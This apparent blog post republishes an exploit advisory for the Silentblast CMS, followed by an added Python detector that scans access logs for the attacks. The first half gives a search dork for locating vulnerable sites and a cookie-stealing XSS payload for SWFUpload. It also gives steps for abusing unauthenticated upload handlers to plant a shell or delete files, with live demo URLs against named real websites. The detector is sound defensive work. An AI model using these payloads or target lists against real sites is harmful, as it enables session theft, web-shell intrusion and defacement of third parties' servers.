News from a Twitter post is circulating that the web-design company Silent Blast's website silentblast.com has multiple vulnerabilities in SWFUpload; we tested them and they are working. While on Twitter we saw a post from @Inj3ct0r, who posted:
 
We tested the dork given below; here is the screenshot:
 
[Screenshot: index list]
The complete details from Inj3ct0r are below:

Title : CMS Provided by Silentblast Interactive Multiple Vulnerabilities

# Date: 2013-03-15

# Software Link: http://www.silentblast.com/

# Credit: This bug was found by Asesino04 “The Black Devils”

# Tested on: Windows XP SP2

# Category: [webapps]

# Dork : inurl:/admin/includes/swfupload/

-----------

XSS

http://127.0.0.1/path/components/com_wordpress/path/wp-includes/js/swfupload/swfupload.swf?buttonText=[ XSS ]

doc_upload

You can upload files and remove others:

http://127.0.0.1/admin/includes/doc_upload.php

Image upload: you can bypass it and upload a shell

http://www.doncarmody.com/admin/includes/image_upload.php

Then you’ll find your file here:

http://127.0.0.1/images/cms/

And from here you can easily change the logo picture:

http://127.0.0.1/admin/includes/image_upload.php?moduleID=1&imageName=cmsLogo&module=cmsSettings&type=cmslogo&categoryID=0

 https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/c0.0.380.380/p403x403/581866_256194131184828_1398221432_n.jpg

# Demo :

http://www.doncarmody.com/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E

http://www.stlukesmerced.org/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E

You can check the direct link.
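For site operators running this CMS, the two issues above leave distinctive traces in web-server access logs: a `buttonText` parameter on `swfupload.swf` carrying HTML markup or a `javascript:` URI, and POST requests to the `admin/includes/*_upload.php` handlers that should only ever come from authenticated administrators. The following detector is an added example written for this page, not code from Inj3ct0r or Silentblast; the log lines are constructed (documentation-range IPs) and the combined-log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in Apache combined format (not from the original post).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Mar/2013:10:00:01 +0000] "GET /admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E HTTP/1.1" 200 12034
203.0.113.5 - - [15/Mar/2013:10:00:02 +0000] "GET /admin/includes/swfupload/Flash/swfupload.swf?buttonText=Upload HTTP/1.1" 200 12034
198.51.100.7 - - [15/Mar/2013:10:01:09 +0000] "POST /admin/includes/image_upload.php?moduleID=1&imageName=cmsLogo&module=cmsSettings&type=cmslogo&categoryID=0 HTTP/1.1" 200 512
198.51.100.7 - - [15/Mar/2013:10:02:00 +0000] "GET /images/cms/logo.png HTTP/1.1" 200 8192
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)
# Markup or script-URI fragments that have no business in a button label.
MARKUP_RE = re.compile(r'<|>|javascript:|on\w+\s*=', re.IGNORECASE)
# Upload handlers named in the advisory; every POST to them is worth auditing.
UPLOAD_ENDPOINTS = ('/admin/includes/doc_upload.php', '/admin/includes/image_upload.php')


def classify(line):
    """Return (finding, client_ip, detail) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('url'))
    path = parts.path.lower()
    qs = parse_qs(parts.query, keep_blank_values=True)
    if path.endswith('swfupload.swf'):
        for value in qs.get('buttonText', []):
            # parse_qs already decoded once; unquote again to catch double encoding.
            decoded = unquote(value)
            if MARKUP_RE.search(decoded):
                return ('swfupload_buttontext_xss', m.group('ip'), decoded)
    if path in UPLOAD_ENDPOINTS and m.group('method').upper() == 'POST':
        return ('admin_upload_post_audit', m.group('ip'), path)
    return None


def scan(log_text):
    """Run classify() over every line and keep only the findings."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The benign `buttonText=Upload` request and the later image fetch produce no finding, so the rule isolates the payload shape from ordinary SWFUpload traffic.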
